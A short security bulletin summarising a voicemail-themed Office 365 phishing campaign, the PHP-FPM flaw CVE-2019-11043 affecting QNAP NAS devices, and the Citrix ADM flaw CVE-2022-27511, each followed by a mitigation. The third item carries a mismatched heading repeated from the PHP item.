Attackers are running phishing campaigns to target multiple organizations in the U.S to steal Microsoft Office 365 and Outlook credentials. Attackers are using fake voicemail notifications with HTML attachments. The attackers are using email services in Japan to send their messages and spoof the sender’s address, pretending that the emails are from the targeted organization. The email has an HTML attachment using a music note character to impersonate the file as a sound clip. However, the file’s obfuscated JavaScript code leads the victim to a phishing site. At first, the redirection process takes the victim to a CAPTCHA check, which is created with the goal of evading anti-phishing tools. After that, victims are redirected to a phishing page that could steal their Office 365 accounts.
Mitigation- Frequent employee training can help; users are recommended to confirm that they are on a legitimate login portal before submitting or starting to type a username and password.
Critical PHP Vulnerability Exposes to Remote Attacks
Critical PHP Vulnerability Exposes QNAP NAS Devices to remote code execution. A vulnerability has been reported to affect PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24, and 7.3.x below 7.3.11 with improper nginx config. This vulnerability allows attackers to gain remote code execution. The vulnerability, tracked as CVE-2019-11043, is rated 9.8 out of 10 for severity on the CVSS. For successful attack, it is required that Nginx and php-fpm are running in appliances using the following QNAP operating system versions -QTS 5.0.x and later, QTS 4.5.x and later, QuTS hero h5.0.x and later, QuTS hero h4.5.x and later and QuTScloud c5.0.x and later 4.5.x and later.
Mitigation-: Upgrade to the newest version of QTS or QuTS hero operating systems.
Critical PHP Vulnerability Exposes to Remote Attacks
An advisory by Citrix explained that this vulnerability could be abused to trigger the reset of the administrator password at the next device reboot. It allows an attacker with SSH access to connect with the default administrator credentials after the device has rebooted. This improper access control vulnerability (CVE-2022-27511) created a risk that a remote, unauthenticated user could not only crash a system via a denial-of-service (DoS) exploit but go on to reset admin credentials on the next subsequent reboot.
Mitigation- Upgrade to the most recent versions of its technology – Citrix ADM 13.1-21.53, Citrix ADM 13.0-85.19, or subsequent releases.